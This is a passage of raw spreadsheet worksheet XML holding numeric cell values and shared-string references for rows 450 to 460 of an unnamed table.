      <c r="T450">
        <v>1</v>
      </c>
      <c r="U450">
        <v>0</v>
      </c>
      <c r="V450">
        <v>5000</v>
      </c>
      <c r="W450">
        <v>0</v>
      </c>
      <c r="X450">
        <v>0</v>
      </c>
      <c r="Y450">
        <v>0</v>
      </c>
      <c r="Z450">
        <v>0</v>
      </c>
      <c r="AA450">
        <v>0</v>
      </c>
      <c r="AB450">
        <v>6000</v>
      </c>
      <c r="AC450">
        <v>1000</v>
      </c>
      <c r="AD450">
        <v>0</v>
      </c>
      <c r="AE450">
        <v>32000</v>
      </c>
      <c r="AF450" t="s">
        <v>3674</v>
      </c>
      <c r="AG450">
        <v>50115</v>
      </c>
      <c r="AH450">
        <v>14</v>
      </c>
      <c r="AJ450">
        <v>220</v>
      </c>
      <c r="AK450" t="s">
        <v>2654</v>
      </c>
      <c r="AL450" t="s">
        <v>3675</v>
      </c>
      <c r="AM450" t="s">
        <v>3676</v>
      </c>
      <c r="AN450" t="s">
        <v>55</v>
      </c>
      <c r="AO450">
        <v>1994</v>
      </c>
      <c r="AP450">
        <v>246581482</v>
      </c>
      <c r="AQ450" t="s">
        <v>3677</v>
      </c>
      <c r="AR450" t="s">
        <v>3674</v>
      </c>
      <c r="AS450" t="s">
        <v>71</v>
      </c>
      <c r="AT450" t="s">
        <v>58</v>
      </c>
      <c r="AU450">
        <v>25</v>
      </c>
      <c r="AV450">
        <v>0</v>
      </c>
      <c r="AW450">
        <v>0</v>
      </c>
      <c r="AX450">
        <v>0</v>
      </c>
      <c r="AY450">
        <v>24</v>
      </c>
      <c r="AZ450">
        <v>42</v>
      </c>
      <c r="BA450" t="s">
        <v>17541</v>
      </c>
      <c r="BB450">
        <v>0</v>
      </c>
      <c r="BC450">
        <v>0</v>
      </c>
      <c r="BD450" t="s">
        <v>12154</v>
      </c>
    </row>
    <row r="451" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A451">
        <v>1166</v>
      </c>
      <c r="B451" t="s">
        <v>3678</v>
      </c>
      <c r="C451" t="s">
        <v>157</v>
      </c>
      <c r="D451" t="s">
        <v>3679</v>
      </c>
      <c r="E451" t="s">
        <v>142</v>
      </c>
      <c r="F451" t="s">
        <v>562</v>
      </c>
      <c r="G451" s="1">
        <v>44155</v>
      </c>
      <c r="H451">
        <v>6564</v>
      </c>
      <c r="I451">
        <v>6564</v>
      </c>
      <c r="J451">
        <v>4</v>
      </c>
      <c r="K451">
        <v>0</v>
      </c>
      <c r="L451">
        <v>0</v>
      </c>
      <c r="M451">
        <v>0</v>
      </c>
      <c r="N451">
        <v>0</v>
      </c>
      <c r="O451">
        <v>0</v>
      </c>
      <c r="P451">
        <v>0</v>
      </c>
      <c r="Q451">
        <v>4</v>
      </c>
      <c r="R451">
        <v>0</v>
      </c>
      <c r="S451">
        <v>0</v>
      </c>
      <c r="T451">
        <v>0</v>
      </c>
      <c r="U451">
        <v>0</v>
      </c>
      <c r="V451">
        <v>0</v>
      </c>
      <c r="W451">
        <v>0</v>
      </c>
      <c r="X451">
        <v>0</v>
      </c>
      <c r="Y451">
        <v>0</v>
      </c>
      <c r="Z451">
        <v>0</v>
      </c>
      <c r="AA451">
        <v>0</v>
      </c>
      <c r="AB451">
        <v>0</v>
      </c>
      <c r="AC451">
        <v>0</v>
      </c>
      <c r="AD451">
        <v>0</v>
      </c>
      <c r="AE451">
        <v>0</v>
      </c>
      <c r="AF451" t="s">
        <v>3680</v>
      </c>
      <c r="AG451">
        <v>68362</v>
      </c>
      <c r="AH451">
        <v>16</v>
      </c>
      <c r="AJ451">
        <v>239</v>
      </c>
      <c r="AK451" t="s">
        <v>564</v>
      </c>
      <c r="AL451" t="s">
        <v>565</v>
      </c>
      <c r="AM451" t="s">
        <v>3681</v>
      </c>
      <c r="AN451" t="s">
        <v>82</v>
      </c>
      <c r="AO451">
        <v>2016</v>
      </c>
      <c r="AP451">
        <v>338677622</v>
      </c>
      <c r="AQ451" t="s">
        <v>3682</v>
      </c>
      <c r="AR451" t="s">
        <v>3683</v>
      </c>
      <c r="AS451" t="s">
        <v>71</v>
      </c>
      <c r="AT451" t="s">
        <v>86</v>
      </c>
      <c r="AU451">
        <v>25</v>
      </c>
      <c r="AV451">
        <v>1</v>
      </c>
      <c r="AW451">
        <v>0</v>
      </c>
      <c r="AX451">
        <v>0</v>
      </c>
      <c r="AY451">
        <v>87</v>
      </c>
      <c r="AZ451">
        <v>415</v>
      </c>
      <c r="BA451" t="s">
        <v>16648</v>
      </c>
      <c r="BB451" t="s">
        <v>15094</v>
      </c>
      <c r="BC451">
        <v>0</v>
      </c>
      <c r="BD451" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="452" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A452">
        <v>1300</v>
      </c>
      <c r="B452" t="s">
        <v>3684</v>
      </c>
      <c r="C452" t="s">
        <v>99</v>
      </c>
      <c r="D452" t="s">
        <v>3685</v>
      </c>
      <c r="E452" t="s">
        <v>131</v>
      </c>
      <c r="F452" t="s">
        <v>3686</v>
      </c>
      <c r="G452" s="1">
        <v>44183</v>
      </c>
      <c r="H452">
        <v>6576</v>
      </c>
      <c r="I452">
        <v>6576</v>
      </c>
      <c r="J452">
        <v>0</v>
      </c>
      <c r="K452">
        <v>1</v>
      </c>
      <c r="L452">
        <v>0</v>
      </c>
      <c r="M452">
        <v>0</v>
      </c>
      <c r="N452">
        <v>0</v>
      </c>
      <c r="O452">
        <v>0</v>
      </c>
      <c r="P452">
        <v>0</v>
      </c>
      <c r="Q452">
        <v>0</v>
      </c>
      <c r="R452">
        <v>0</v>
      </c>
      <c r="S452">
        <v>0</v>
      </c>
      <c r="T452">
        <v>0</v>
      </c>
      <c r="U452">
        <v>0</v>
      </c>
      <c r="V452">
        <v>15</v>
      </c>
      <c r="W452">
        <v>0</v>
      </c>
      <c r="X452">
        <v>0</v>
      </c>
      <c r="Y452">
        <v>0</v>
      </c>
      <c r="Z452">
        <v>0</v>
      </c>
      <c r="AA452">
        <v>0</v>
      </c>
      <c r="AB452">
        <v>0</v>
      </c>
      <c r="AC452">
        <v>0</v>
      </c>
      <c r="AD452">
        <v>0</v>
      </c>
      <c r="AE452">
        <v>0</v>
      </c>
      <c r="AF452" t="s">
        <v>3687</v>
      </c>
      <c r="AG452">
        <v>11710</v>
      </c>
      <c r="AH452">
        <v>12</v>
      </c>
      <c r="AJ452">
        <v>159</v>
      </c>
      <c r="AK452" t="s">
        <v>405</v>
      </c>
      <c r="AL452" t="s">
        <v>406</v>
      </c>
      <c r="AM452" t="s">
        <v>3688</v>
      </c>
      <c r="AN452" t="s">
        <v>55</v>
      </c>
      <c r="AO452">
        <v>2008</v>
      </c>
      <c r="AP452" t="s">
        <v>3689</v>
      </c>
      <c r="AQ452" t="s">
        <v>3690</v>
      </c>
      <c r="AR452" t="s">
        <v>3687</v>
      </c>
      <c r="AS452" t="s">
        <v>553</v>
      </c>
      <c r="AT452" t="s">
        <v>58</v>
      </c>
      <c r="AU452">
        <v>20</v>
      </c>
      <c r="AV452">
        <v>1</v>
      </c>
      <c r="AW452">
        <v>4</v>
      </c>
      <c r="AX452">
        <v>0</v>
      </c>
      <c r="AY452">
        <v>3</v>
      </c>
      <c r="AZ452">
        <v>2</v>
      </c>
      <c r="BA452" t="s">
        <v>17540</v>
      </c>
      <c r="BB452">
        <v>0</v>
      </c>
      <c r="BC452" t="s">
        <v>12156</v>
      </c>
      <c r="BD452">
        <v>0</v>
      </c>
    </row>
    <row r="453" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A453">
        <v>1369</v>
      </c>
      <c r="B453" t="s">
        <v>3691</v>
      </c>
      <c r="C453" t="s">
        <v>3692</v>
      </c>
      <c r="D453" t="s">
        <v>3693</v>
      </c>
      <c r="E453" t="s">
        <v>916</v>
      </c>
      <c r="F453" t="s">
        <v>3694</v>
      </c>
      <c r="G453" s="1">
        <v>44117</v>
      </c>
      <c r="H453">
        <v>6585</v>
      </c>
      <c r="I453">
        <v>6585</v>
      </c>
      <c r="J453">
        <v>0</v>
      </c>
      <c r="K453">
        <v>0</v>
      </c>
      <c r="L453">
        <v>0</v>
      </c>
      <c r="M453">
        <v>0</v>
      </c>
      <c r="N453">
        <v>0</v>
      </c>
      <c r="O453">
        <v>0</v>
      </c>
      <c r="P453">
        <v>0</v>
      </c>
      <c r="Q453">
        <v>1</v>
      </c>
      <c r="R453">
        <v>1</v>
      </c>
      <c r="S453">
        <v>0</v>
      </c>
      <c r="T453">
        <v>0</v>
      </c>
      <c r="U453">
        <v>0</v>
      </c>
      <c r="V453">
        <v>0</v>
      </c>
      <c r="W453">
        <v>0</v>
      </c>
      <c r="X453">
        <v>0</v>
      </c>
      <c r="Y453">
        <v>0</v>
      </c>
      <c r="Z453">
        <v>0</v>
      </c>
      <c r="AA453">
        <v>0</v>
      </c>
      <c r="AB453">
        <v>100</v>
      </c>
      <c r="AC453">
        <v>350</v>
      </c>
      <c r="AD453">
        <v>0</v>
      </c>
      <c r="AE453">
        <v>0</v>
      </c>
      <c r="AF453" t="s">
        <v>3691</v>
      </c>
      <c r="AG453">
        <v>27563</v>
      </c>
      <c r="AH453">
        <v>3</v>
      </c>
      <c r="AJ453">
        <v>60</v>
      </c>
      <c r="AK453" t="s">
        <v>3695</v>
      </c>
      <c r="AL453" t="s">
        <v>3696</v>
      </c>
      <c r="AM453" t="s">
        <v>3697</v>
      </c>
      <c r="AN453" t="s">
        <v>68</v>
      </c>
      <c r="AO453">
        <v>2012</v>
      </c>
      <c r="AP453">
        <v>82170527878</v>
      </c>
      <c r="AQ453" t="s">
        <v>3698</v>
      </c>
      <c r="AR453" t="s">
        <v>3699</v>
      </c>
      <c r="AS453" t="s">
        <v>71</v>
      </c>
      <c r="AT453" t="s">
        <v>72</v>
      </c>
      <c r="AU453">
        <v>8</v>
      </c>
      <c r="AV453">
        <v>0</v>
      </c>
      <c r="AW453">
        <v>0</v>
      </c>
      <c r="AX453">
        <v>0</v>
      </c>
      <c r="AY453">
        <v>0</v>
      </c>
      <c r="AZ453">
        <v>5</v>
      </c>
      <c r="BA453" t="s">
        <v>16861</v>
      </c>
      <c r="BB453" t="s">
        <v>15230</v>
      </c>
      <c r="BC453" t="s">
        <v>12161</v>
      </c>
      <c r="BD453">
        <v>0</v>
      </c>
    </row>
    <row r="454" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A454">
        <v>1623</v>
      </c>
      <c r="B454" t="s">
        <v>3700</v>
      </c>
      <c r="C454" t="s">
        <v>189</v>
      </c>
      <c r="D454" t="s">
        <v>3701</v>
      </c>
      <c r="E454" t="s">
        <v>111</v>
      </c>
      <c r="F454" t="s">
        <v>3702</v>
      </c>
      <c r="G454" s="1">
        <v>44131</v>
      </c>
      <c r="H454">
        <v>6685</v>
      </c>
      <c r="I454">
        <v>6685</v>
      </c>
      <c r="J454">
        <v>1</v>
      </c>
      <c r="K454">
        <v>1</v>
      </c>
      <c r="L454">
        <v>1</v>
      </c>
      <c r="M454">
        <v>0</v>
      </c>
      <c r="N454">
        <v>0</v>
      </c>
      <c r="O454">
        <v>0</v>
      </c>
      <c r="P454">
        <v>0</v>
      </c>
      <c r="Q454">
        <v>0</v>
      </c>
      <c r="R454">
        <v>2</v>
      </c>
      <c r="S454">
        <v>1</v>
      </c>
      <c r="T454">
        <v>1</v>
      </c>
      <c r="U454">
        <v>3000</v>
      </c>
      <c r="V454">
        <v>1</v>
      </c>
      <c r="W454">
        <v>3000</v>
      </c>
      <c r="X454">
        <v>0</v>
      </c>
      <c r="Y454">
        <v>0</v>
      </c>
      <c r="Z454">
        <v>0</v>
      </c>
      <c r="AA454">
        <v>0</v>
      </c>
      <c r="AB454">
        <v>0</v>
      </c>
      <c r="AC454">
        <v>5000</v>
      </c>
      <c r="AD454">
        <v>1</v>
      </c>
      <c r="AE454">
        <v>50000</v>
      </c>
      <c r="AF454" t="s">
        <v>3703</v>
      </c>
      <c r="AG454">
        <v>97235</v>
      </c>
      <c r="AH454">
        <v>31</v>
      </c>
      <c r="AJ454">
        <v>461</v>
      </c>
      <c r="AK454" t="s">
        <v>1099</v>
      </c>
      <c r="AL454" t="s">
        <v>3704</v>
      </c>
      <c r="AM454" t="s">
        <v>3705</v>
      </c>
      <c r="AN454" t="s">
        <v>55</v>
      </c>
      <c r="AO454">
        <v>2011</v>
      </c>
      <c r="AP454" t="s">
        <v>3706</v>
      </c>
      <c r="AQ454">
        <v>85243003000</v>
      </c>
      <c r="AR454" t="s">
        <v>3707</v>
      </c>
      <c r="AU454">
        <v>26</v>
      </c>
      <c r="AV454">
        <v>1</v>
      </c>
      <c r="AW454">
        <v>0</v>
      </c>
      <c r="AX454">
        <v>0</v>
      </c>
      <c r="AY454">
        <v>74</v>
      </c>
      <c r="AZ454">
        <v>54</v>
      </c>
      <c r="BA454" t="s">
        <v>16954</v>
      </c>
      <c r="BB454" t="s">
        <v>14212</v>
      </c>
      <c r="BC454">
        <v>0</v>
      </c>
      <c r="BD454" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="455" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A455">
        <v>1199</v>
      </c>
      <c r="B455" t="s">
        <v>3708</v>
      </c>
      <c r="C455" t="s">
        <v>99</v>
      </c>
      <c r="D455" t="s">
        <v>3709</v>
      </c>
      <c r="E455" t="s">
        <v>300</v>
      </c>
      <c r="F455" t="s">
        <v>3710</v>
      </c>
      <c r="G455" s="1">
        <v>44182</v>
      </c>
      <c r="H455">
        <v>6725</v>
      </c>
      <c r="I455">
        <v>6725</v>
      </c>
      <c r="J455">
        <v>5</v>
      </c>
      <c r="K455">
        <v>2</v>
      </c>
      <c r="L455">
        <v>1</v>
      </c>
      <c r="M455">
        <v>0</v>
      </c>
      <c r="N455">
        <v>15000</v>
      </c>
      <c r="O455">
        <v>0</v>
      </c>
      <c r="P455">
        <v>0</v>
      </c>
      <c r="Q455">
        <v>25</v>
      </c>
      <c r="R455">
        <v>2</v>
      </c>
      <c r="S455">
        <v>0</v>
      </c>
      <c r="T455">
        <v>1</v>
      </c>
      <c r="U455">
        <v>50000</v>
      </c>
      <c r="V455">
        <v>10000</v>
      </c>
      <c r="W455">
        <v>15000</v>
      </c>
      <c r="X455">
        <v>0</v>
      </c>
      <c r="Y455">
        <v>0</v>
      </c>
      <c r="Z455">
        <v>0</v>
      </c>
      <c r="AA455">
        <v>0</v>
      </c>
      <c r="AB455">
        <v>25000</v>
      </c>
      <c r="AC455">
        <v>9000</v>
      </c>
      <c r="AD455">
        <v>0</v>
      </c>
      <c r="AE455">
        <v>5000</v>
      </c>
      <c r="AF455" t="s">
        <v>3711</v>
      </c>
      <c r="AG455">
        <v>14440</v>
      </c>
      <c r="AH455">
        <v>12</v>
      </c>
      <c r="AJ455">
        <v>160</v>
      </c>
      <c r="AK455" t="s">
        <v>114</v>
      </c>
      <c r="AL455" t="s">
        <v>114</v>
      </c>
      <c r="AM455" t="s">
        <v>3712</v>
      </c>
      <c r="AN455" t="s">
        <v>82</v>
      </c>
      <c r="AO455">
        <v>2018</v>
      </c>
      <c r="AP455" t="s">
        <v>3713</v>
      </c>
      <c r="AQ455" t="s">
        <v>3714</v>
      </c>
      <c r="AR455" t="s">
        <v>3715</v>
      </c>
      <c r="AS455" t="s">
        <v>71</v>
      </c>
      <c r="AT455" t="s">
        <v>86</v>
      </c>
      <c r="AU455">
        <v>0</v>
      </c>
      <c r="AV455">
        <v>0</v>
      </c>
      <c r="AW455">
        <v>29</v>
      </c>
      <c r="AX455">
        <v>22</v>
      </c>
      <c r="AY455">
        <v>4</v>
      </c>
      <c r="AZ455">
        <v>7</v>
      </c>
      <c r="BA455">
        <v>0</v>
      </c>
      <c r="BB455" t="s">
        <v>15117</v>
      </c>
      <c r="BC455">
        <v>0</v>
      </c>
      <c r="BD455" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="456" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A456">
        <v>1246</v>
      </c>
      <c r="B456" t="s">
        <v>3716</v>
      </c>
      <c r="C456" t="s">
        <v>3717</v>
      </c>
      <c r="D456" t="s">
        <v>3718</v>
      </c>
      <c r="E456" t="s">
        <v>300</v>
      </c>
      <c r="F456" t="s">
        <v>3719</v>
      </c>
      <c r="G456" s="1">
        <v>44116</v>
      </c>
      <c r="H456">
        <v>6738</v>
      </c>
      <c r="I456">
        <v>6738</v>
      </c>
      <c r="J456">
        <v>10</v>
      </c>
      <c r="K456">
        <v>5</v>
      </c>
      <c r="L456">
        <v>0</v>
      </c>
      <c r="M456">
        <v>0</v>
      </c>
      <c r="N456">
        <v>0</v>
      </c>
      <c r="O456">
        <v>6</v>
      </c>
      <c r="P456">
        <v>0</v>
      </c>
      <c r="Q456">
        <v>5</v>
      </c>
      <c r="R456">
        <v>1000</v>
      </c>
      <c r="S456">
        <v>1</v>
      </c>
      <c r="T456">
        <v>0</v>
      </c>
      <c r="U456">
        <v>100000</v>
      </c>
      <c r="V456">
        <v>5</v>
      </c>
      <c r="W456">
        <v>0</v>
      </c>
      <c r="X456">
        <v>0</v>
      </c>
      <c r="Y456">
        <v>0</v>
      </c>
      <c r="Z456">
        <v>6</v>
      </c>
      <c r="AA456">
        <v>0</v>
      </c>
      <c r="AB456">
        <v>50000</v>
      </c>
      <c r="AC456">
        <v>100</v>
      </c>
      <c r="AD456">
        <v>1</v>
      </c>
      <c r="AE456">
        <v>0</v>
      </c>
      <c r="AF456" t="s">
        <v>3720</v>
      </c>
      <c r="AG456">
        <v>0</v>
      </c>
      <c r="AH456">
        <v>8</v>
      </c>
      <c r="AJ456">
        <v>125</v>
      </c>
      <c r="AK456" t="s">
        <v>3721</v>
      </c>
      <c r="AL456" t="s">
        <v>3722</v>
      </c>
      <c r="AM456" t="s">
        <v>3723</v>
      </c>
      <c r="AN456" t="s">
        <v>68</v>
      </c>
      <c r="AO456">
        <v>2018</v>
      </c>
      <c r="AP456">
        <v>85267775467</v>
      </c>
      <c r="AQ456" t="s">
        <v>3724</v>
      </c>
      <c r="AR456" t="s">
        <v>3720</v>
      </c>
      <c r="AS456" t="s">
        <v>371</v>
      </c>
      <c r="AT456" t="s">
        <v>72</v>
      </c>
      <c r="AU456">
        <v>30</v>
      </c>
      <c r="AV456">
        <v>0</v>
      </c>
      <c r="AW456">
        <v>44</v>
      </c>
      <c r="AX456">
        <v>43</v>
      </c>
      <c r="AY456">
        <v>5</v>
      </c>
      <c r="AZ456">
        <v>6</v>
      </c>
      <c r="BA456" t="s">
        <v>17550</v>
      </c>
      <c r="BB456" t="s">
        <v>14955</v>
      </c>
      <c r="BC456" t="s">
        <v>12243</v>
      </c>
      <c r="BD456">
        <v>0</v>
      </c>
    </row>
    <row r="457" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A457">
        <v>974</v>
      </c>
      <c r="B457" t="s">
        <v>3725</v>
      </c>
      <c r="C457" t="s">
        <v>88</v>
      </c>
      <c r="D457" t="s">
        <v>3726</v>
      </c>
      <c r="E457" t="s">
        <v>111</v>
      </c>
      <c r="F457" t="s">
        <v>3727</v>
      </c>
      <c r="G457" s="1">
        <v>44139</v>
      </c>
      <c r="H457">
        <v>6753</v>
      </c>
      <c r="I457">
        <v>6753</v>
      </c>
      <c r="J457">
        <v>1</v>
      </c>
      <c r="K457">
        <v>1</v>
      </c>
      <c r="L457">
        <v>1</v>
      </c>
      <c r="M457">
        <v>0</v>
      </c>
      <c r="N457">
        <v>0</v>
      </c>
      <c r="O457">
        <v>0</v>
      </c>
      <c r="P457">
        <v>0</v>
      </c>
      <c r="Q457">
        <v>0</v>
      </c>
      <c r="R457">
        <v>2</v>
      </c>
      <c r="S457">
        <v>0</v>
      </c>
      <c r="T457">
        <v>0</v>
      </c>
      <c r="U457">
        <v>5000</v>
      </c>
      <c r="V457">
        <v>2000</v>
      </c>
      <c r="W457">
        <v>6000</v>
      </c>
      <c r="X457">
        <v>0</v>
      </c>
      <c r="Y457">
        <v>0</v>
      </c>
      <c r="Z457">
        <v>0</v>
      </c>
      <c r="AA457">
        <v>0</v>
      </c>
      <c r="AB457">
        <v>0</v>
      </c>
      <c r="AC457">
        <v>3000</v>
      </c>
      <c r="AD457">
        <v>0</v>
      </c>
      <c r="AE457">
        <v>0</v>
      </c>
      <c r="AF457" t="s">
        <v>3728</v>
      </c>
      <c r="AG457">
        <v>80220</v>
      </c>
      <c r="AH457">
        <v>17</v>
      </c>
      <c r="AJ457">
        <v>282</v>
      </c>
      <c r="AK457" t="s">
        <v>592</v>
      </c>
      <c r="AL457" t="s">
        <v>1903</v>
      </c>
      <c r="AM457" t="s">
        <v>3729</v>
      </c>
      <c r="AN457" t="s">
        <v>55</v>
      </c>
      <c r="AO457">
        <v>2016</v>
      </c>
      <c r="AP457" t="s">
        <v>3730</v>
      </c>
      <c r="AQ457" t="s">
        <v>3731</v>
      </c>
      <c r="AR457" t="s">
        <v>3728</v>
      </c>
      <c r="AS457" t="s">
        <v>71</v>
      </c>
      <c r="AT457" t="s">
        <v>58</v>
      </c>
      <c r="AU457">
        <v>25</v>
      </c>
      <c r="AV457">
        <v>1</v>
      </c>
      <c r="AW457">
        <v>0</v>
      </c>
      <c r="AX457">
        <v>0</v>
      </c>
      <c r="AY457">
        <v>32</v>
      </c>
      <c r="AZ457">
        <v>6</v>
      </c>
      <c r="BA457" t="s">
        <v>17532</v>
      </c>
      <c r="BB457" t="s">
        <v>14973</v>
      </c>
      <c r="BC457" t="s">
        <v>12132</v>
      </c>
      <c r="BD457" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="458" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A458">
        <v>1035</v>
      </c>
      <c r="B458" t="s">
        <v>3732</v>
      </c>
      <c r="C458" t="s">
        <v>157</v>
      </c>
      <c r="D458" t="s">
        <v>3733</v>
      </c>
      <c r="E458" t="s">
        <v>1346</v>
      </c>
      <c r="F458" t="s">
        <v>3734</v>
      </c>
      <c r="G458" s="1">
        <v>44211</v>
      </c>
      <c r="H458">
        <v>6792</v>
      </c>
      <c r="I458">
        <v>6792</v>
      </c>
      <c r="J458">
        <v>1</v>
      </c>
      <c r="K458">
        <v>0</v>
      </c>
      <c r="L458">
        <v>6</v>
      </c>
      <c r="M458">
        <v>0</v>
      </c>
      <c r="N458">
        <v>0</v>
      </c>
      <c r="O458">
        <v>0</v>
      </c>
      <c r="P458">
        <v>1</v>
      </c>
      <c r="Q458">
        <v>0</v>
      </c>
      <c r="R458">
        <v>20</v>
      </c>
      <c r="S458">
        <v>4</v>
      </c>
      <c r="T458">
        <v>1</v>
      </c>
      <c r="U458">
        <v>1000000</v>
      </c>
      <c r="V458">
        <v>0</v>
      </c>
      <c r="W458">
        <v>24000</v>
      </c>
      <c r="X458">
        <v>0</v>
      </c>
      <c r="Y458">
        <v>0</v>
      </c>
      <c r="Z458">
        <v>0</v>
      </c>
      <c r="AA458">
        <v>20000</v>
      </c>
      <c r="AB458">
        <v>0</v>
      </c>
      <c r="AC458">
        <v>6000</v>
      </c>
      <c r="AD458">
        <v>6000</v>
      </c>
      <c r="AE458">
        <v>1000</v>
      </c>
      <c r="AF458" t="s">
        <v>3735</v>
      </c>
      <c r="AG458">
        <v>68472</v>
      </c>
      <c r="AH458">
        <v>16</v>
      </c>
      <c r="AJ458">
        <v>237</v>
      </c>
      <c r="AK458" t="s">
        <v>377</v>
      </c>
      <c r="AL458" t="s">
        <v>378</v>
      </c>
      <c r="AM458" t="s">
        <v>3736</v>
      </c>
      <c r="AN458" t="s">
        <v>55</v>
      </c>
      <c r="AO458">
        <v>1993</v>
      </c>
      <c r="AP458" t="s">
        <v>3737</v>
      </c>
      <c r="AQ458" t="s">
        <v>3738</v>
      </c>
      <c r="AR458" t="s">
        <v>3735</v>
      </c>
      <c r="AS458" t="s">
        <v>71</v>
      </c>
      <c r="AT458" t="s">
        <v>58</v>
      </c>
      <c r="AU458">
        <v>6</v>
      </c>
      <c r="AV458">
        <v>1</v>
      </c>
      <c r="AW458">
        <v>51</v>
      </c>
      <c r="AX458">
        <v>254</v>
      </c>
      <c r="AY458">
        <v>142</v>
      </c>
      <c r="AZ458">
        <v>98</v>
      </c>
      <c r="BA458" t="s">
        <v>16794</v>
      </c>
      <c r="BB458" t="s">
        <v>15016</v>
      </c>
      <c r="BC458">
        <v>0</v>
      </c>
      <c r="BD458" t="s">
        <v>12723</v>
      </c>
    </row>
    <row r="459" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A459">
        <v>1223</v>
      </c>
      <c r="B459" t="s">
        <v>3739</v>
      </c>
      <c r="C459" t="s">
        <v>318</v>
      </c>
      <c r="D459" t="s">
        <v>3740</v>
      </c>
      <c r="E459" t="s">
        <v>111</v>
      </c>
      <c r="F459" t="s">
        <v>3741</v>
      </c>
      <c r="G459" s="1">
        <v>44258</v>
      </c>
      <c r="H459">
        <v>6801</v>
      </c>
      <c r="I459">
        <v>6801</v>
      </c>
      <c r="J459">
        <v>2</v>
      </c>
      <c r="K459">
        <v>0</v>
      </c>
      <c r="L459">
        <v>2</v>
      </c>
      <c r="M459">
        <v>0</v>
      </c>
      <c r="N459">
        <v>0</v>
      </c>
      <c r="O459">
        <v>0</v>
      </c>
      <c r="P459">
        <v>0</v>
      </c>
      <c r="Q459">
        <v>3</v>
      </c>
      <c r="R459">
        <v>6</v>
      </c>
      <c r="S459">
        <v>0</v>
      </c>
      <c r="T459">
        <v>0</v>
      </c>
      <c r="U459">
        <v>2000000</v>
      </c>
      <c r="V459">
        <v>0</v>
      </c>
      <c r="W459">
        <v>4000</v>
      </c>
      <c r="X459">
        <v>0</v>
      </c>
      <c r="Y459">
        <v>0</v>
      </c>
      <c r="Z459">
        <v>0</v>
      </c>
      <c r="AA459">
        <v>0</v>
      </c>
      <c r="AB459">
        <v>200</v>
      </c>
      <c r="AC459">
        <v>3000</v>
      </c>
      <c r="AD459">
        <v>0</v>
      </c>
      <c r="AE459">
        <v>0</v>
      </c>
      <c r="AF459" t="s">
        <v>3742</v>
      </c>
      <c r="AG459">
        <v>90552</v>
      </c>
      <c r="AH459">
        <v>26</v>
      </c>
      <c r="AJ459">
        <v>406</v>
      </c>
      <c r="AK459" t="s">
        <v>647</v>
      </c>
      <c r="AL459" t="s">
        <v>3743</v>
      </c>
      <c r="AM459" t="s">
        <v>3744</v>
      </c>
      <c r="AN459" t="s">
        <v>55</v>
      </c>
      <c r="AO459">
        <v>2017</v>
      </c>
      <c r="AP459">
        <v>81354535314</v>
      </c>
      <c r="AQ459" t="s">
        <v>3745</v>
      </c>
      <c r="AR459" t="s">
        <v>3742</v>
      </c>
      <c r="AS459" t="s">
        <v>71</v>
      </c>
      <c r="AT459" t="s">
        <v>58</v>
      </c>
      <c r="AU459">
        <v>26</v>
      </c>
      <c r="AV459">
        <v>0</v>
      </c>
      <c r="AW459">
        <v>5</v>
      </c>
      <c r="AX459">
        <v>23</v>
      </c>
      <c r="AY459">
        <v>2</v>
      </c>
      <c r="AZ459">
        <v>4</v>
      </c>
      <c r="BA459" t="s">
        <v>17548</v>
      </c>
      <c r="BB459" t="s">
        <v>15137</v>
      </c>
      <c r="BC459" t="s">
        <v>9536</v>
      </c>
      <c r="BD459" t="s">
        <v>12262</v>
      </c>
    </row>
    <row r="460" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A460">
        <v>1162</v>
      </c>
      <c r="B460" t="s">
        <v>3746</v>
      </c>
      <c r="C460" t="s">
        <v>129</v>
      </c>
      <c r="D460" t="s">
        <v>3747</v>
      </c>
      <c r="E460" t="s">
        <v>142</v>
      </c>
      <c r="F460" t="s">
        <v>1746</v>
      </c>
      <c r="G460" s="1">
        <v>44186</v>
      </c>
      <c r="H460">
        <v>6815</v>
      </c>
      <c r="I460">
        <v>6815</v>
      </c>
      <c r="J460">
        <v>3</v>
      </c>
      <c r="K460">
        <v>0</v>
      </c>
      <c r="L460">
        <v>0</v>
      </c>
      <c r="M460">
        <v>4</v>
      </c>
      <c r="N460">
        <v>0</v>
      </c>
      <c r="O460">
        <v>0</v>
      </c>
      <c r="P460">
        <v>1</v>
      </c>
      <c r="Q460">
        <v>0</v>
      </c>
      <c r="R460">
        <v>0</v>
      </c>
      <c r="S460">
        <v>0</v>
      </c>
      <c r="T460">
        <v>1</v>
      </c>
      <c r="U460">
        <v>5000000</v>
      </c>
      <c r="V460">
        <v>0</v>
      </c>
      <c r="W460">
        <v>0</v>
      </c>
      <c r="X460">
        <v>800</v>
      </c>
      <c r="Y460">
        <v>0</v>
      </c>
      <c r="Z460">
        <v>0</v>
      </c>
      <c r="AA460">
        <v>1000</v>
      </c>
      <c r="AB460">
        <v>0</v>
      </c>
      <c r="AC460">
        <v>0</v>
      </c>
      <c r="AD460">
        <v>0</v>
      </c>
      <c r="AE460">
        <v>0</v>
      </c>
      <c r="AF460" t="s">
        <v>623</v>
      </c>
      <c r="AG460">
        <v>42186</v>
      </c>
      <c r="AH460">
        <v>11</v>
      </c>
      <c r="AJ460">
        <v>269</v>
      </c>
      <c r="AK460" t="s">
        <v>3748</v>
      </c>
      <c r="AL460" t="s">
        <v>3749</v>
      </c>
      <c r="AM460" t="s">
        <v>3750</v>
      </c>
      <c r="AN460" t="s">
        <v>82</v>
      </c>
      <c r="AO460">
        <v>2012</v>
      </c>
      <c r="AP460" t="s">
        <v>3751</v>
      </c>
      <c r="AQ460" t="s">
        <v>3752</v>
      </c>
      <c r="AR460" t="s">
        <v>3753</v>
      </c>
      <c r="AS460" t="s">
        <v>71</v>
      </c>
      <c r="AT460" t="s">
        <v>86</v>
      </c>
      <c r="AU460">
        <v>30</v>
      </c>
      <c r="AV460">
        <v>1</v>
      </c>
      <c r="AW460">
        <v>80</v>
      </c>
